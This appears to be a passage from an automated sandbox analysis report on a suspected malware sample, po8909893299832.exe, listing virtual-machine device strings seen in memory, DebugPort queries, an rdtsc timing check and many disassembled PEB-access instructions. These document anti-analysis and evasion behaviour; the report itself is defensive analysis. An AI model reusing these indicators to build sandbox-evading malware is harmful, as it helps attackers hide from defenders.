Source: explorer.exe, 0000001C.00000002.3853757556.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 0000001C.00000003.3692744839.0000000008D08000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691932048.0000000008D03000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877919375.0000000008D15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3693340134.0000000008D12000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2484869487.0000000008D1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWble Mouse
Source: explorer.exe, 0000001C.00000003.2513182377.0000000009008000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000U
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\!
Source: explorer.exe, 0000001C.00000003.2434655387.0000000008CB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: explorer.exe, 0000001C.00000003.2555903546.000000000C5DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((9
Source: explorer.exe, 0000001C.00000003.2575476121.000000000C54F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 0000001C.00000003.2575476121.000000000C54F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000002.3853757556.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001C.00000002.3871599666.000000000496B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1427258598.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000003.2553926787.0000000008F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2

Source: C:\Users\user\Desktop\po8909893299832.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\po8909893299832.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\po8909893299832.exe

Code function: 9_2_01A5096E rdtsc

9_2_01A5096E

Source: C:\Users\user\Desktop\po8909893299832.exe

Code function: 9_2_01A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,

9_2_01A52BF0

Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A50185 mov eax, dword ptr fs:[00000030h]	9_2_01A50185
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACC188 mov eax, dword ptr fs:[00000030h]	9_2_01ACC188
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACC188 mov eax, dword ptr fs:[00000030h]	9_2_01ACC188
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB4180 mov eax, dword ptr fs:[00000030h]	9_2_01AB4180
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB4180 mov eax, dword ptr fs:[00000030h]	9_2_01AB4180
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9019F mov eax, dword ptr fs:[00000030h]	9_2_01A9019F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9019F mov eax, dword ptr fs:[00000030h]	9_2_01A9019F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9019F mov eax, dword ptr fs:[00000030h]	9_2_01A9019F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9019F mov eax, dword ptr fs:[00000030h]	9_2_01A9019F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A197 mov eax, dword ptr fs:[00000030h]	9_2_01A0A197
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A197 mov eax, dword ptr fs:[00000030h]	9_2_01A0A197
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A197 mov eax, dword ptr fs:[00000030h]	9_2_01A0A197
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE61E5 mov eax, dword ptr fs:[00000030h]	9_2_01AE61E5
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A401F8 mov eax, dword ptr fs:[00000030h]	9_2_01A401F8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD61C3 mov eax, dword ptr fs:[00000030h]	9_2_01AD61C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD61C3 mov eax, dword ptr fs:[00000030h]	9_2_01AD61C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E1D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E1D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_01A8E1D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E1D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E1D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A40124 mov eax, dword ptr fs:[00000030h]	9_2_01A40124
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov ecx, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov ecx, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov ecx, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov eax, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE10E mov ecx, dword ptr fs:[00000030h]	9_2_01ABE10E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABA118 mov ecx, dword ptr fs:[00000030h]	9_2_01ABA118
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABA118 mov eax, dword ptr fs:[00000030h]	9_2_01ABA118
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABA118 mov eax, dword ptr fs:[00000030h]	9_2_01ABA118
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABA118 mov eax, dword ptr fs:[00000030h]	9_2_01ABA118
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD0115 mov eax, dword ptr fs:[00000030h]	9_2_01AD0115
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA4144 mov eax, dword ptr fs:[00000030h]	9_2_01AA4144
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA4144 mov eax, dword ptr fs:[00000030h]	9_2_01AA4144
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA4144 mov ecx, dword ptr fs:[00000030h]	9_2_01AA4144
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA4144 mov eax, dword ptr fs:[00000030h]	9_2_01AA4144
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA4144 mov eax, dword ptr fs:[00000030h]	9_2_01AA4144
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA8158 mov eax, dword ptr fs:[00000030h]	9_2_01AA8158
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16154 mov eax, dword ptr fs:[00000030h]	9_2_01A16154
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16154 mov eax, dword ptr fs:[00000030h]	9_2_01A16154
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0C156 mov eax, dword ptr fs:[00000030h]	9_2_01A0C156
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA80A8 mov eax, dword ptr fs:[00000030h]	9_2_01AA80A8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD60B8 mov eax, dword ptr fs:[00000030h]	9_2_01AD60B8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD60B8 mov ecx, dword ptr fs:[00000030h]	9_2_01AD60B8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1208A mov eax, dword ptr fs:[00000030h]	9_2_01A1208A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_01A0A0E3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A180E9 mov eax, dword ptr fs:[00000030h]	9_2_01A180E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A960E0 mov eax, dword ptr fs:[00000030h]	9_2_01A960E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0C0F0 mov eax, dword ptr fs:[00000030h]	9_2_01A0C0F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A520F0 mov ecx, dword ptr fs:[00000030h]	9_2_01A520F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A920DE mov eax, dword ptr fs:[00000030h]	9_2_01A920DE
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A020 mov eax, dword ptr fs:[00000030h]	9_2_01A0A020
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0C020 mov eax, dword ptr fs:[00000030h]	9_2_01A0C020
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6030 mov eax, dword ptr fs:[00000030h]	9_2_01AA6030
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A94000 mov ecx, dword ptr fs:[00000030h]	9_2_01A94000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000 mov eax, dword ptr fs:[00000030h]	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E016 mov eax, dword ptr fs:[00000030h]	9_2_01A2E016
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E016 mov eax, dword ptr fs:[00000030h]	9_2_01A2E016
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E016 mov eax, dword ptr fs:[00000030h]	9_2_01A2E016
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E016 mov eax, dword ptr fs:[00000030h]	9_2_01A2E016
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3C073 mov eax, dword ptr fs:[00000030h]	9_2_01A3C073
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A12050 mov eax, dword ptr fs:[00000030h]	9_2_01A12050
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96050 mov eax, dword ptr fs:[00000030h]	9_2_01A96050
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E388 mov eax, dword ptr fs:[00000030h]	9_2_01A0E388
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E388 mov eax, dword ptr fs:[00000030h]	9_2_01A0E388
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E388 mov eax, dword ptr fs:[00000030h]	9_2_01A0E388
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3438F mov eax, dword ptr fs:[00000030h]	9_2_01A3438F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3438F mov eax, dword ptr fs:[00000030h]	9_2_01A3438F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A08397 mov eax, dword ptr fs:[00000030h]	9_2_01A08397
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A08397 mov eax, dword ptr fs:[00000030h]	9_2_01A08397
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A08397 mov eax, dword ptr fs:[00000030h]	9_2_01A08397
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A203E9 mov eax, dword ptr fs:[00000030h]	9_2_01A203E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A2E3F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A2E3F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A2E3F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A463FF mov eax, dword ptr fs:[00000030h]	9_2_01A463FF
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACC3CD mov eax, dword ptr fs:[00000030h]	9_2_01ACC3CD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A3C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A183C0 mov eax, dword ptr fs:[00000030h]	9_2_01A183C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A183C0 mov eax, dword ptr fs:[00000030h]	9_2_01A183C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A183C0 mov eax, dword ptr fs:[00000030h]	9_2_01A183C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A183C0 mov eax, dword ptr fs:[00000030h]	9_2_01A183C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A963C0 mov eax, dword ptr fs:[00000030h]	9_2_01A963C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE3DB mov eax, dword ptr fs:[00000030h]	9_2_01ABE3DB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE3DB mov eax, dword ptr fs:[00000030h]	9_2_01ABE3DB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE3DB mov ecx, dword ptr fs:[00000030h]	9_2_01ABE3DB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABE3DB mov eax, dword ptr fs:[00000030h]	9_2_01ABE3DB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB43D4 mov eax, dword ptr fs:[00000030h]	9_2_01AB43D4
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB43D4 mov eax, dword ptr fs:[00000030h]	9_2_01AB43D4
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A30B mov eax, dword ptr fs:[00000030h]	9_2_01A4A30B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A30B mov eax, dword ptr fs:[00000030h]	9_2_01A4A30B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A30B mov eax, dword ptr fs:[00000030h]	9_2_01A4A30B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0C310 mov ecx, dword ptr fs:[00000030h]	9_2_01A0C310
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A30310 mov ecx, dword ptr fs:[00000030h]	9_2_01A30310
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB437C mov eax, dword ptr fs:[00000030h]	9_2_01AB437C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A92349 mov eax, dword ptr fs:[00000030h]	9_2_01A92349
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov eax, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov eax, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov eax, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov ecx, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov eax, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9035C mov eax, dword ptr fs:[00000030h]	9_2_01A9035C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB8350 mov ecx, dword ptr fs:[00000030h]	9_2_01AB8350
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADA352 mov eax, dword ptr fs:[00000030h]	9_2_01ADA352
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A202A0 mov eax, dword ptr fs:[00000030h]	9_2_01A202A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A202A0 mov eax, dword ptr fs:[00000030h]	9_2_01A202A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov ecx, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AA62A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E284 mov eax, dword ptr fs:[00000030h]	9_2_01A4E284
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E284 mov eax, dword ptr fs:[00000030h]	9_2_01A4E284
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A90283 mov eax, dword ptr fs:[00000030h]	9_2_01A90283
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A90283 mov eax, dword ptr fs:[00000030h]	9_2_01A90283
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A90283 mov eax, dword ptr fs:[00000030h]	9_2_01A90283
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A202E1 mov eax, dword ptr fs:[00000030h]	9_2_01A202E1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A202E1 mov eax, dword ptr fs:[00000030h]	9_2_01A202E1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A202E1 mov eax, dword ptr fs:[00000030h]	9_2_01A202E1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A1A2C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A1A2C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A1A2C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A1A2C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A1A2C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0823B mov eax, dword ptr fs:[00000030h]	9_2_01A0823B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14260 mov eax, dword ptr fs:[00000030h]	9_2_01A14260
